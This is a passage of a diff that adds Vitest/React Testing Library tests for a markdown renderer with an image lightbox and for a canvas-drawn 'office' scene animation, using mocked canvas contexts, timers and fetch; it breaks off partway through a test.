+    expect(img().getAttribute('style')).toContain('min-height: 120px')
+    fireEvent.load(img())
+    expect(img().getAttribute('style') || '').not.toContain('min-height')
+  })
+
+  it('opens the lightbox for the clicked image and reports its siblings', () => {
+    const details: { images: { src: string }[]; index: number }[] = []
+    const spy = (e: Event) => details.push((e as CustomEvent).detail)
+    window.addEventListener('lightbox', spy)
+    try {
+      const { container } = render(
+        <MarkdownRenderer content={'![one](/tmp/one.png)\n\n![two](/tmp/two.png)'} />,
+      )
+      const imgs = container.querySelectorAll('img')
+      expect(imgs).toHaveLength(2)
+      fireEvent.click(imgs[1])
+      expect(details).toHaveLength(1)
+      expect(details[0].index).toBe(1)
+      expect(details[0].images).toHaveLength(2)
+    } finally {
+      window.removeEventListener('lightbox', spy)
+    }
+  })
+})
+
+// ── streaming decorations ──────────────────────────────────────────────────
+
+describe('MarkdownRenderer streaming decorations', () => {
+  it('glows only the trailing words of a long tail, cut at a word boundary', () => {
+    const content = 'The gateway finished indexing every skill in the workspace already'
+    const { container } = render(<MarkdownRenderer content={content} streaming glow />)
+    const glowEl = container.querySelector('.streaming-glow')
+    expect(glowEl).not.toBeNull()
+    const tail = glowEl!.textContent || ''
+    // Shorter than the whole paragraph, and starts at a word boundary.
+    expect(tail.length).toBeLessThan(content.length)
+    expect(content.endsWith(tail.trim())).toBe(true)
+    expect(tail.startsWith(' ')).toBe(true)
+  })
+
+  it('falls back to a root-level caret when the tail block holds only code', () => {
+    // An indented code block is a <pre>, which both the caret walk and the glow
+    // walk skip — so there is no eligible text node to anchor to.
+    const { container } = render(<MarkdownRenderer content={'    indented only'} streaming glow />)
+    const caret = container.querySelector('.streaming-caret')
+    expect(caret).not.toBeNull()
+    expect(caret!.closest('pre')).toBeNull()
+    expect(container.querySelector('.streaming-glow')).toBeNull()
+  })
+
+  it('keeps the caret out of a fenced-looking pre while still glowing the prose', () => {
+    const { container } = render(
+      <MarkdownRenderer content={'    held code\n\nlive prose tail'} streaming glow />,
+    )
+    const caret = container.querySelector('.streaming-caret')
+    expect(caret).not.toBeNull()
+    expect(caret!.closest('pre')).toBeNull()
+  })
+
+  it('decorates a trailing text run that sits directly at the document root', () => {
+    // A block-level raw HTML element followed by text on the same HTML block
+    // leaves that text as a ROOT child rather than inside a <p>, which is the
+    // one shape where the caret and the glow splice into the root's children.
+    const { container } = render(
+      <MarkdownRenderer content={'<div>lead block</div> trailing tail words'} streaming glow />,
+    )
+    const glowEl = container.querySelector('.streaming-glow')
+    expect(glowEl).not.toBeNull()
+    expect(glowEl!.textContent).toContain('trailing tail words')
+    expect(glowEl!.closest('p')).toBeNull()
+    expect(container.querySelector('.streaming-caret')).not.toBeNull()
+  })
+
+  it('does not defer a trailing table when the streamed tail ends on a blank line', () => {
+    const { container } = render(
+      <MarkdownRenderer content={'| a | b |\n| --- | --- |\n| 1 | 2 |\n\n'} streaming glow />,
+    )
+    expect(container.querySelector('table')).not.toBeNull()
+  })
+
+  it('settles the smooth reveal edge to ft-idle once the content stops changing', async () => {
+    vi.useFakeTimers()
+    try {
+      const { container } = render(<MarkdownRenderer content={'streaming words'} streaming smooth glow />)
+      const root = container.querySelector('.ft-anim-smooth')!
+      expect(root.className).not.toContain('ft-idle')
+      await act(async () => { vi.advanceTimersByTime(600) })
+      expect(container.querySelector('.ft-anim-smooth')!.className).toContain('ft-idle')
+    } finally {
+      vi.useRealTimers()
+    }
+  })
+
+  it('renders raw source verbatim in rawMode', () => {
+    const { container } = render(<MarkdownRenderer content={'# Heading\n\n**bold**'} rawMode />)
+    const pre = container.querySelector('pre')
+    expect(pre).not.toBeNull()
+    expect(pre!.textContent).toBe('# Heading\n\n**bold**')
+    expect(container.querySelector('h1')).toBeNull()
+  })
+})
+
+// ── heading / structural component overrides ───────────────────────────────
+
+describe('MarkdownRenderer structural elements', () => {
+  it('slugifies heading ids at every level, reading through nested inline markup', () => {
+    const md = [
+      '# Top *One*',
+      '### Third `here`',
+      '#### Fourth',
+      '##### Fifth',
+      '###### Sixth',
+    ].join('\n\n')
+    const { container } = render(<MarkdownRenderer content={md} />)
+    expect(container.querySelector('h1')!.id).toBe('top-one')
+    expect(container.querySelector('h3')!.id).toBe('third-here')
+    expect(container.querySelector('h4')!.id).toBe('fourth')
+    expect(container.querySelector('h5')!.id).toBe('fifth')
+    expect(container.querySelector('h6')!.id).toBe('sixth')
+  })
+
+  it('uses the image alt text when a heading is just an image', () => {
+    const { container } = render(<MarkdownRenderer content={'## ![Logo Mark](/tmp/logo.png)'} />)
+    expect(container.querySelector('h2')!.id).toBe('logo-mark')
+  })
+
+  it('renders blockquotes, rules and fenced code through the overrides', () => {
+    const { container } = render(
+      <MarkdownRenderer content={'> quoted line\n\n---\n\n```js\nconst a = 1\n```'} />,
+    )
+    expect(container.querySelector('blockquote')).not.toBeNull()
+    expect(container.querySelector('hr')).not.toBeNull()
+    expect(container.textContent).toContain('const a = 1')
+  })
+
+  it('renders a fence nested in a blockquote through the inline code override', async () => {
+    // The block assembler only splits fences that START a line, so a quoted
+    // fence stays inside the markdown block and reaches the `code` override.
+    // Note the fence still renders as a code block rather than staying inside
+    // the quote: fixCodeFences' "blank line before a glued opening fence" pass
+    // rewrites `> ```js` to `> ` + a top-level fence, which empties the quote
+    // and carries the `> ` markers into the code text. Asserted here as the
+    // CURRENT behaviour, not as the desirable one.
+    const { container } = render(
+      <MarkdownRenderer content={'> ```js\n> const quoted = 1\n> ```'} />,
+    )
+    await waitFor(() => expect(container.textContent).toContain('const quoted = 1'))
+    expect(container.querySelector('.code-block')).not.toBeNull()
+  })
+})
+
+// ── block routing ──────────────────────────────────────────────────────────
+
+describe('MarkdownRenderer block routing', () => {
+  const diff = '```diff\n@@ -1 +1 @@\n-old line\n+new line\n```'
+
+  it('takes the diff path hint from the preceding chat text', async () => {
+    const onFileOpen = vi.fn()
+    const { container } = render(
+      <MarkdownRenderer content={`Updated \`/tmp/report.md\`:\n...\n\n${diff}`} onFileOpen={onFileOpen} />,
+    )
+    await waitFor(() => expect(container.textContent).toContain('new line'))
+    expect(container.textContent).toContain('report.md')
+  })
+
+  it('leaves the diff header-less when the preceding text names no path', async () => {
+    const { container } = render(<MarkdownRenderer content={`Here is the change:\n\n${diff}`} />)
+    await waitFor(() => expect(container.textContent).toContain('new line'))
+    expect(container.textContent).not.toContain('/tmp/')
+  })
+
+  it('wraps a streaming diff in the smooth-resize shell', async () => {
+    const { container } = render(
+      <MarkdownRenderer content={`Wrote /tmp/out.txt\n\n${diff}`} streaming smooth />,
+    )
+    await waitFor(() => expect(container.textContent).toContain('new line'))
+  })
+
+  it('shows a placeholder for an unclosed widget and the frame once it closes', async () => {
+    const queryClient = new QueryClient({
+      defaultOptions: { queries: { retry: false }, mutations: { retry: false } },
+    })
+    const wrap = (ui: ReactNode) =>
+      render(
+        <QueryClientProvider client={queryClient}>
+          <ThemeProvider>{ui}</ThemeProvider>
+        </QueryClientProvider>,
+      )
+    const open = wrap(
+      <MarkdownRenderer content={'<mcwidget title="Queue">\n<p>partial</p>'} streaming />,
+    )
+    expect(open.container.querySelector('iframe')).toBeNull()
+    open.unmount()
+
+    const done = wrap(
+      <MarkdownRenderer
+        content={'<mcwidget title="Queue">\n<p>done</p>\n</mcwidget>'}
+        messageTs={'2026-08-11T00:00:00Z'}
+      />,
+    )
+    await waitFor(() => expect(done.container.querySelector('iframe')).not.toBeNull())
+    done.unmount()
+    queryClient.clear()
+  })
+})
+
+// ── path chip activation fallback ──────────────────────────────────────────
+
+describe('MarkdownRenderer path chip with no file handler', () => {
+  const realFetch = globalThis.fetch
+  beforeEach(() => { __resetPathKindCache() })
+  afterEach(() => { globalThis.fetch = realFetch; vi.restoreAllMocks() })
+
+  it('reveals the file in the OS file manager when no onFileOpen is wired', async () => {
+    globalThis.fetch = vi.fn(() =>
+      Promise.resolve({ ok: true, status: 200, headers: new Headers({ 'X-Path-Kind': 'file' }) } as Response),
+    ) as unknown as typeof fetch
+    const reveal = vi.spyOn(api, 'revealPath').mockResolvedValue(undefined as never)
+    const { container } = render(<MarkdownRenderer content={'`/tmp/notes/plan.md`'} />)
+    const chip = await waitFor(() => {
+      const c = container.querySelector('code[data-path-kind="file"]') as HTMLElement | null
+      expect(c).not.toBeNull()
+      return c!
+    })
+    fireEvent.click(chip)
+    expect(reveal).toHaveBeenCalledWith('/tmp/notes/plan.md')
+  })
+})
+
+// ── lightbox toolbar, dismissal and download ───────────────────────────────
+
+describe('Lightbox toolbar and dismissal', () => {
+  function open(images: { src: string; alt?: string }[], index = 0) {
+    window.dispatchEvent(new CustomEvent('lightbox', {
+      detail: { images: images.map(i => ({ src: i.src, alt: i.alt ?? '' })), index },
+    }))
+  }
+
+  it('steps zoom with the toolbar buttons and resets to fit', () => {
+    const { container, getByLabelText } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    const style = () => container.querySelector('img')!.getAttribute('style') || ''
+    // At fit, both shrink controls are inert.
+    expect((getByLabelText('Zoom out (-)') as HTMLButtonElement).disabled).toBe(true)
+    expect((getByLabelText('Reset zoom (0)') as HTMLButtonElement).disabled).toBe(true)
+    act(() => { fireEvent.click(getByLabelText('Zoom in (+)')) })
+    expect(style()).toContain('scale(1.5)')
+    act(() => { fireEvent.click(getByLabelText('Zoom in (+)')) })
+    expect(style()).toContain('scale(2)')
+    act(() => { fireEvent.click(getByLabelText('Zoom out (-)')) })
+    expect(style()).toContain('scale(1.5)')
+    act(() => { fireEvent.click(getByLabelText('Reset zoom (0)')) })
+    expect(style()).toContain('scale(1)')
+  })
+
+  it('closes via the close button', () => {
+    const { container, getByLabelText } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    act(() => { fireEvent.click(getByLabelText('Close')) })
+    expect(container.firstChild).toBeNull()
+  })
+
+  it('closes when the backdrop itself is clicked', () => {
+    const { container } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    const backdrop = container.querySelector('[role="button"]')!
+    act(() => { fireEvent.click(backdrop) })
+    expect(container.firstChild).toBeNull()
+  })
+
+  it('closes when a lightbox event arrives with no detail', () => {
+    const { container } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    expect(container.querySelector('img')).not.toBeNull()
+    act(() => { window.dispatchEvent(new CustomEvent('lightbox')) })
+    expect(container.firstChild).toBeNull()
+  })
+
+  it('suppresses the native image drag so it cannot be dropped out of the viewer', () => {
+    const { container } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    const dragEvent = fireEvent.dragStart(container.querySelector('img')!)
+    expect(dragEvent).toBe(false)
+  })
+
+  it('does not pan while the image is at fit, and ignores moves with no pointer down', () => {
+    const { container } = render(<Lightbox />)
+    act(() => open([{ src: 'a.png', alt: 'a' }]))
+    const imgEl = () => container.querySelector('img')!
+    Object.defineProperty(imgEl(), 'offsetWidth', { configurable: true, value: 3000 })
+    Object.defineProperty(imgEl(), 'offsetHeight', { configurable: true, value: 3000 })
+    // pointerDown at fit is a no-op, so the following move has nothing to drag.
+    act(() => { fireEvent.pointerDown(imgEl(), { clientX: 500, clientY: 500, pointerId: 1 }) })
+    act(() => { fireEvent.pointerMove(imgEl(), { clientX: 200, clientY: 200, pointerId: 1 }) })
+    expect(imgEl().getAttribute('style')).toContain('translate(0px, 0px)')
+    expect(imgEl().className).toContain('cursor-default')
+    // A stray move with no preceding down is ignored even once zoomed.
+    act(() => { fireEvent.keyDown(window, { key: '+' }) })
+    act(() => { fireEvent.pointerMove(imgEl(), { clientX: 40, clientY: 40, pointerId: 1 }) })
+    expect(imgEl().getAttribute('style')).toContain('translate(0px, 0px)')
+  })
+})
+
+describe('Lightbox download', () => {
+  let clicks: { download: string; href: string }[]
+  let clickSpy: ReturnType<typeof vi.spyOn>
+  let createObjectURL: typeof URL.createObjectURL
+  let revokeObjectURL: typeof URL.revokeObjectURL
+  let fetchMock: ReturnType<typeof vi.fn>
+  let openMock: ReturnType<typeof vi.fn>
+
+  beforeEach(() => {
+    clicks = []
+    createObjectURL = URL.createObjectURL
+    revokeObjectURL = URL.revokeObjectURL
+    URL.createObjectURL = vi.fn(() => 'blob:shot')
+    URL.revokeObjectURL = vi.fn()
+    clickSpy = vi.spyOn(HTMLAnchorElement.prototype, 'click').mockImplementation(function (
+      this: HTMLAnchorElement,
+    ) {
+      clicks.push({ download: this.download, href: this.getAttribute('href') ?? '' })
+    })
+    fetchMock = vi.fn(() =>
+      Promise.resolve({ ok: true, status: 200, blob: () => Promise.resolve(new Blob(['bytes'])) } as unknown as Response),
+    )
+    openMock = vi.fn()
+    vi.stubGlobal('fetch', fetchMock)
+    vi.stubGlobal('open', openMock)
+  })
+
+  afterEach(() => {
+    clickSpy.mockRestore()
+    URL.createObjectURL = createObjectURL
+    URL.revokeObjectURL = revokeObjectURL
+    vi.unstubAllGlobals()
+  })
+
+  function open(src: string, alt = '') {
+    window.dispatchEvent(new CustomEvent('lightbox', { detail: { images: [{ src, alt }], index: 0 } }))
+  }
+
+  it('downloads the served bytes, naming the file from the ?path= query', async () => {
+    vi.useFakeTimers()
+    try {
+      const { getByLabelText } = render(<Lightbox />)
+      act(() => open('/api/file-raw?path=%2Ftmp%2Fshots%2Fpanel.png', 'panel'))
+      act(() => { fireEvent.click(getByLabelText('Download image')) })
+      await vi.waitFor(() => expect(clicks).toHaveLength(1))
+      expect(clicks[0]).toEqual({ download: 'panel.png', href: 'blob:shot' })
+      expect(fetchMock).toHaveBeenCalledWith('/api/file-raw?path=%2Ftmp%2Fshots%2Fpanel.png')
+      expect(document.querySelector('a[download]')).toBeNull()
+      // The object URL is released shortly after the click.
+      vi.advanceTimersByTime(1000)
+      expect(URL.revokeObjectURL).toHaveBeenCalledWith('blob:shot')
+    } finally {
+      vi.useRealTimers()
+    }
+  })
+
+  it('names a remote image from its URL basename', async () => {
+    const { getByLabelText } = render(<Lightbox />)
+    act(() => open('https://example.invalid/media/diagram.svg', 'diagram'))
+    act(() => { fireEvent.click(getByLabelText('Download image')) })
+    await waitFor(() => expect(clicks).toHaveLength(1))
+    expect(clicks[0].download).toBe('diagram.svg')
+  })
+
+  it('falls back to the alt text when the source carries no filename', async () => {
+    const { getByLabelText } = render(<Lightbox />)
+    act(() => open('data:image/png;base64,iVBORw0KGgo=', 'Kiro Crew banner'))
+    act(() => { fireEvent.click(getByLabelText('Download image')) })
+    await waitFor(() => expect(clicks).toHaveLength(1))
+    expect(clicks[0].download).toBe('Kiro_Crew_banner')
+  })
+
+  it('opens the image in a new tab when the fetch is refused', async () => {
+    fetchMock.mockResolvedValue({ ok: false, status: 403 } as unknown as Response)
+    const { getByLabelText } = render(<Lightbox />)
+    act(() => open('https://example.invalid/blocked.png', 'blocked'))
+    act(() => { fireEvent.click(getByLabelText('Download image')) })
+    await waitFor(() => expect(openMock).toHaveBeenCalled())
+    expect(openMock).toHaveBeenCalledWith('https://example.invalid/blocked.png', '_blank', 'noopener,noreferrer')
+    expect(clicks).toHaveLength(0)
+  })
+
+  it('downloads the current image on the "d" shortcut', async () => {
+    const { getByLabelText } = render(<Lightbox />)
+    act(() => open('/api/file-raw?path=%2Ftmp%2Fshot.png', 'shot'))
+    // The toolbar button is present, but this path is the keyboard one.
+    expect(getByLabelText('Download image')).not.toBeNull()
+    act(() => { fireEvent.keyDown(window, { key: 'd' }) })
+    await waitFor(() => expect(clicks).toHaveLength(1))
+    expect(clicks[0].download).toBe('shot.png')
+  })
+
+  it('leaves the "d" shortcut alone while the user is typing in a field', async () => {
+    render(<Lightbox />)
+    act(() => open('/api/file-raw?path=%2Ftmp%2Fshot.png', 'shot'))
+    const input = document.createElement('input')
+    document.body.appendChild(input)
+    try {
+      act(() => { fireEvent.keyDown(input, { key: 'd' }) })
+      await Promise.resolve()
+      expect(clicks).toHaveLength(0)
+      expect(fetchMock).not.toHaveBeenCalled()
+    } finally {
+      input.remove()
+    }
+  })
+})

--- a/website/src/test/OfficeSceneCoverage.test.tsx
+++ b/website/src/test/OfficeSceneCoverage.test.tsx
@@ -1,0 +1,577 @@
+/**
+ * OfficeScene — the Worlds open-plan office — driven frame by frame.
+ *
+ * `Scenes.test.tsx` only proves the scene mounts a canvas, so everything the
+ * office actually DOES after mount (the doorway glow while someone walks in,
+ * the blinking monitors, the steaming mug, the coffee break, the whiteboard
+ * visit, the pair-programming huddle and its chat bubbles) never ran. jsdom has
+ * no 2D context and no frame clock, so the harness supplies both:
+ *
+ *   - a RECORDING canvas context, so a test can ask "was the doorway glow
+ *     painted?" or "which labels landed on the overlay?" instead of reading
+ *     pixels;
+ *   - a hand-driven `requestAnimationFrame`, so a test advances exactly N
+ *     frames with no dependence on a real animation clock;
+ *   - a pinned `Math.random` and `Date.now`, so the collaboration, coffee and
+ *     whiteboard dice rolls and the speech-bubble expiry are deterministic.
+ *
+ * Recording is switched off while fast-forwarding thousands of frames (the
+ * office routine only starts at tick 600) and switched back on for the single
+ * frame under assertion, so memory stays flat.
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, act } from '@testing-library/react'
+import { Provider } from 'react-redux'
+import { MemoryRouter } from 'react-router-dom'
+import { configureStore } from '@reduxjs/toolkit'
+import chatReducer from '../store/chatSlice'
+import OfficeScene from '../pages/scenes/OfficeScene'
+import { markAgentsKnown } from '../hooks/sceneStateCache'
+import { SCENE_SCALE } from '../pages/scenes/config'
+import type { AgentSource } from '../hooks/useAgentSync'
+
+/* ── Scene geometry mirrored from OfficeScene (it exports none of it) ── */
+const S = SCENE_SCALE
+/** Desk anchors; an agent sits at (x + 10, y + 20). */
+const DESKS = [
+  { x: 40, y: 120 }, { x: 120, y: 120 }, { x: 200, y: 120 }, { x: 280, y: 120 },
+  { x: 40, y: 200 }, { x: 120, y: 200 }, { x: 200, y: 200 }, { x: 280, y: 200 },
+]
+const COFFEE = { x: 390, y: 240 }
+const CLOCK = { x: 170, y: 22 }
+
+/* ── Recording 2D context ── */
+
+interface FillRecord { x: number; y: number; w: number; h: number; color: string }
+interface TextRecord { text: string; x: number; y: number }
+
+interface Recorder {
+  ctx: CanvasRenderingContext2D
+  fills: FillRecord[]
+  texts: TextRecord[]
+  /** How many dashed-line runs the collaboration link asked for. */
+  dashes: { count: number }
+}
+
+/**
+ * A 2D context that remembers what it was told to draw. Unknown members become
+ * no-op spies on first access, so a helper reaching for `ellipse` or
+ * `setLineDash` never has to be enumerated here.
+ */
+function createRecorder(): Recorder {
+  const fills: FillRecord[] = []
+  const texts: TextRecord[] = []
+  const dashes = { count: 0 }
+  const gradient = { addColorStop: vi.fn() }
+
+  const store: Record<string, unknown> = {
+    fillStyle: '#000000',
+    strokeStyle: '#000000',
+    globalAlpha: 1,
+    lineWidth: 1,
+    font: '',
+    textAlign: 'start',
+    textBaseline: 'alphabetic',
+    imageSmoothingEnabled: false,
+    canvas: { width: 0, height: 0 },
+    createLinearGradient: vi.fn(() => gradient),
+    createRadialGradient: vi.fn(() => gradient),
+    createPattern: vi.fn(() => null),
+    // Width proportional to length so the real word-wrapper actually wraps.
+    measureText: vi.fn((t: string) => ({ width: t.length * 8 })),
+    getImageData: vi.fn(() => ({ data: new Uint8ClampedArray(4) })),
+  }
+  store.fillRect = (x: number, y: number, w: number, h: number) => {
+    if (capturing) fills.push({ x, y, w, h, color: String(store.fillStyle) })
+  }
+  store.fillText = (text: string, x: number, y: number) => {
+    if (capturing) texts.push({ text, x, y })
+  }
+  store.setLineDash = (pattern: number[]) => {
+    if (capturing && pattern.length) dashes.count++
+  }
+
+  const ctx = new Proxy(store, {
+    get(target, prop) {
+      const key = String(prop)
+      if (!(key in target)) target[key] = vi.fn()
+      return target[key]
+    },
+    set(target, prop, value) {
+      target[String(prop)] = value
+      return true
+    },
+  }) as unknown as CanvasRenderingContext2D
+
+  return { ctx, fills, texts, dashes }
+}
+
+/* ── Harness state ── */
+
+/** Every context handed out this test, in creation order. */
+let recorders: Recorder[] = []
+/** Frame callbacks queued by the scene loop, keyed by the id rAF handed back. */
+let queuedFrames = new Map<number, FrameRequestCallback>()
+let frameSeq = 0
+/** Value `Math.random()` returns — low enough to pass every routine dice roll. */
+let rand = 0.05
+/** Value `Date.now()` returns — tests advance it to age a speech bubble. */
+let nowMs = 1_700_000_000_000
+/** While false, the recording context drops everything (fast-forward mode). */
+let capturing = true
+
+beforeEach(() => {
+  recorders = []
+  queuedFrames = new Map()
+  frameSeq = 0
+  rand = 0.05
+  nowMs = 1_700_000_000_000
+  capturing = true
+  HTMLCanvasElement.prototype.getContext = vi.fn(() => {
+    const rec = createRecorder()
+    recorders.push(rec)
+    return rec.ctx
+  }) as unknown as HTMLCanvasElement['getContext']
+  vi.spyOn(Math, 'random').mockImplementation(() => rand)
+  vi.spyOn(Date, 'now').mockImplementation(() => nowMs)
+  vi.stubGlobal('requestAnimationFrame', (cb: FrameRequestCallback) => {
+    const id = ++frameSeq
+    queuedFrames.set(id, cb)
+    return id
+  })
+  vi.stubGlobal('cancelAnimationFrame', (id: number) => { queuedFrames.delete(id) })
+})
+
+afterEach(() => {
+  vi.unstubAllGlobals()
+  vi.restoreAllMocks()
+  localStorage.clear()
+})
+
+/** Advance every live scene loop by exactly `n` frames, recording each one. */
+function runFrames(n: number) {
+  act(() => {
+    for (let i = 0; i < n; i++) {
+      const due = [...queuedFrames.values()]
+      queuedFrames.clear()
+      due.forEach(cb => cb(0))
+    }
+  })
+}
+
+/** Fast-forward `n` frames without recording anything they paint. */
+function fastForward(n: number) {
+  capturing = false
+  runFrames(n)
+  capturing = true
+}
+
+/** Drop everything recorded so far, so the next frame stands alone. */
+function clearRecords() {
+  recorders.forEach(r => { r.fills.length = 0; r.texts.length = 0; r.dashes.count = 0 })
+}
+
+/**
+ * Step the loop in bursts, recording only the last frame of each burst, until
+ * `pred` holds. Frame-exact expectations would be brittle — an agent's walk
+ * length depends on which desk it started from — so poll instead of guessing.
+ */
+function stepUntil(pred: () => boolean, maxFrames: number, burst = 10): boolean {
+  for (let elapsed = 0; elapsed < maxFrames; elapsed += burst) {
+    fastForward(burst - 1)
+    clearRecords()
+    runFrames(1)
+    if (pred()) return true
+  }
+  return false
+}
+
+function agent(over: Partial<AgentSource> & { id: string }): AgentSource {
+  return { name: over.id, label: 'default', kind: 'slot', running: false, detail: '', ...over }
+}
+
+function mount(agents: AgentSource[], visible = true) {
+  const store = configureStore({ reducer: { chat: chatReducer } })
+  const base = recorders.length
+  const view = render(
+    <Provider store={store}>
+      <MemoryRouter><OfficeScene agents={agents} visible={visible} /></MemoryRouter>
+    </Provider>,
+  )
+  const rerender = (next: AgentSource[], nextVisible = visible) => view.rerender(
+    <Provider store={store}>
+      <MemoryRouter><OfficeScene agents={next} visible={nextVisible} /></MemoryRouter>
+    </Provider>,
+  )
+  // initSceneCanvases takes the pixel context first, then the text overlay.
+  return { ...view, rerender, pixel: recorders[base], overlay: recorders[base + 1] }
+}
+
+/** Text drawn on the overlay, in draw order. */
+const labels = (rec: Recorder) => rec.texts.map(t => t.text)
+const hasColor = (rec: Recorder, color: string) => rec.fills.some(f => f.color === color)
+/** Where a given label landed, or undefined when it was not drawn. */
+const textAt = (rec: Recorder, text: string) => rec.texts.find(t => t.text === text)
+
+/**
+ * Whether the cubicle nameplate for `name` is hanging on desk `deskIdx`.
+ * Matched by position, because the whiteboard prints the same 8-character
+ * clipping of a running agent's name on its kanban cards.
+ */
+function hasNameplate(rec: Recorder, deskIdx: number, name: string): boolean {
+  const desk = DESKS[deskIdx]
+  return rec.texts.some(t => t.text === name.slice(0, 8)
+    && t.x === (desk.x + 15) * S && t.y === (desk.y + 1) * S)
+}
+
+const DOOR_GLOW = 'rgba(255,200,50,0.08)'
+const MUG_STEAM = 'rgba(255,255,255,0.1)'
+const SCREEN_GREEN = '#33ff33'
+const CLOCK_HAND_DOT = '#f00'
+const COLLAB_MARK = '#f90'
+
+/** Names are 9 characters so the full label never collides with the
+ *  8-character cubicle nameplate the scene derives from it. */
+const ROSALINDA = 'Rosalinda'
+const FERDINAND = 'Ferdinand'
+const BERNADETT = 'Bernadett'
+const CONSTANZA = 'Constanza'
+
+/** Four agents already seen by the office, so they start seated. */
+function seatedCrew(prefix: string, running = true): AgentSource[] {
+  const names = [ROSALINDA, FERDINAND, BERNADETT, CONSTANZA]
+  const sources = names.map((name, i) => agent({ id: `slot-${prefix}-${i}`, name, running }))
+  markAgentsKnown('office', sources.map(s => s.id))
+  return sources
+}
+
+/* ── Tests ── */
+
+describe('OfficeScene furniture', () => {
+  it('renders the pixel canvas and the text overlay with accessible labels', () => {
+    const view = mount([])
+    expect(view.getByLabelText('Office scene')).toBeInTheDocument()
+    expect(view.getByLabelText('Office scene labels')).toBeInTheDocument()
+  })
+
+  it('keeps the pixel canvas unsmoothed so the sprites stay crisp', () => {
+    const view = mount([])
+    const canvas = view.getByLabelText('Office scene') as HTMLCanvasElement
+    expect(canvas.style.imageRendering).toBe('pixelated')
+    expect(canvas.width).toBeGreaterThan(0)
+  })
+
+  it('paints the signage and the kanban columns on the very first frame', () => {
+    const { overlay } = mount([])
+    expect(labels(overlay)).toContain('Agent Office')
+    expect(labels(overlay)).toContain('headquarters')
+    expect(labels(overlay)).toEqual(expect.arrayContaining(['To Do', 'Active', 'Done']))
+    // Nothing is running, so the board shows the placeholder card.
+    expect(labels(overlay)).toContain('No tasks')
+  })
+
+  it('counts an empty office and marks all eight cubicles vacant', () => {
+    const { overlay } = mount([])
+    expect(labels(overlay)).toContain('0/8 agents')
+    expect(labels(overlay).filter(t => t === 'empty')).toHaveLength(8)
+  })
+
+  it('draws nothing while hidden and starts drawing once it becomes visible', () => {
+    const { overlay, rerender } = mount([agent({ id: 'slot-hidden' })], false)
+    runFrames(5)
+    expect(overlay.texts).toHaveLength(0)
+
+    rerender([agent({ id: 'slot-hidden' })], true)
+    runFrames(1)
+    expect(labels(overlay)).toContain('Agent Office')
+  })
+
+  it('lists the running agents on the whiteboard instead of the placeholder', () => {
+    const { overlay } = mount(seatedCrew('board'))
+    expect(labels(overlay)).not.toContain('No tasks')
+    // Cards are clipped to eight characters.
+    expect(labels(overlay)).toContain(ROSALINDA.slice(0, 8))
+  })
+})
+
+describe('OfficeScene animated fittings', () => {
+  it('flashes the clock second dot on the alternating 16-frame phase', () => {
+    mount([])
+    clearRecords()
+    runFrames(1)               // tick 2 — dot off
+    expect(hasColor(recorders[0], CLOCK_HAND_DOT)).toBe(false)
+
+    fastForward(15)
+    clearRecords()
+    runFrames(1)               // tick 18 — dot on
+    const dot = recorders[0].fills.find(f => f.color === CLOCK_HAND_DOT)
+    expect(dot).toBeDefined()
+    expect(dot!.x).toBeCloseTo((CLOCK.x - 0.5) * S)
+  })
+
+  it('blinks a cursor on an occupied monitor', () => {
+    mount(seatedCrew('cursor'))
+    fastForward(7)
+    clearRecords()
+    runFrames(1)               // tick 9 — cursor phase on
+    // The typed lines are 0.8 tall; the cursor is the square one.
+    const cursor = recorders[0].fills.filter(f => f.color === SCREEN_GREEN && f.h === 1 * S)
+    expect(cursor.length).toBeGreaterThan(0)
+  })
+
+  it('shows a standby dot on a vacant monitor and drips the coffee machine', () => {
+    mount([agent({ id: 'slot-standby' })])
+    fastForward(31)
+    clearRecords()
+    runFrames(1)               // tick 33 — both 32-frame phases on
+    const rec = recorders[0]
+    const vacant = DESKS[7]
+    expect(rec.fills.some(f => f.color === '#333'
+      && f.x === (vacant.x + 14) * S && f.y === (vacant.y + 9) * S)).toBe(true)
+    expect(rec.fills.some(f => f.x === (COFFEE.x + 5) * S && f.y === (COFFEE.y + 8) * S)).toBe(true)
+  })
+
+  it('steams the mug on an occupied desk only', () => {
+    mount(seatedCrew('steam'))
+    clearRecords()
+    runFrames(1)               // tick 2 — steam phase off
+    expect(hasColor(recorders[0], MUG_STEAM)).toBe(false)
+
+    fastForward(15)
+    clearRecords()
+    runFrames(1)               // tick 18 — steam phase on
+    expect(hasColor(recorders[0], MUG_STEAM)).toBe(true)
+  })
+
+  it('drifts dust motes through the room once the spawn tick comes round', () => {
+    mount([])
+    clearRecords()
+    runFrames(1)               // tick 2 — no motes yet
+    const dust = (r: Recorder) => r.fills.filter(f => f.color.startsWith('rgba(255,240,200'))
+    expect(dust(recorders[0])).toHaveLength(0)
+
+    fastForward(10)
+    clearRecords()
+    runFrames(1)               // past tick 6 and 12 — two motes alive and moving
+    expect(dust(recorders[0]).length).toBeGreaterThan(0)
+  })
+
+  it('opens the agents eyes after the mount-frame blink', () => {
+    mount(seatedCrew('blink'))
+    clearRecords()
+    runFrames(1)               // tick 2 — still inside the 3-frame blink window
+    const closed = recorders[0].fills.filter(f => f.color === '#333' && f.h === 0.5 * S)
+    expect(closed.length).toBeGreaterThan(0)
+
+    fastForward(2)
+    clearRecords()
+    runFrames(1)               // tick 5 — eyes open, so square pupils
+    const open = recorders[0].fills.filter(f => f.color === '#333' && f.h === 1 * S)
+    expect(open.length).toBeGreaterThan(0)
+  })
+})
+
+describe('OfficeScene arrivals', () => {
+  it('walks an unseen agent in through the doorway, which glows on the flashing frame', () => {
+    mount([agent({ id: 'slot-newcomer', name: ROSALINDA })])
+    fastForward(7)
+    clearRecords()
+    runFrames(1)               // tick 9 — glow phase on while still entering
+    expect(hasColor(recorders[0], DOOR_GLOW)).toBe(true)
+    // Still short of the desk, so no cubicle nameplate yet.
+    expect(hasNameplate(recorders[1], 0, ROSALINDA)).toBe(false)
+    // The walker is still over by the door, not at the desk.
+    const name = textAt(recorders[1], ROSALINDA)
+    expect(name).toBeDefined()
+    expect(name!.x).toBeLessThan(DESKS[0].x * S)
+  })
+
+  it('hangs the cubicle nameplate once the newcomer reaches its desk', () => {
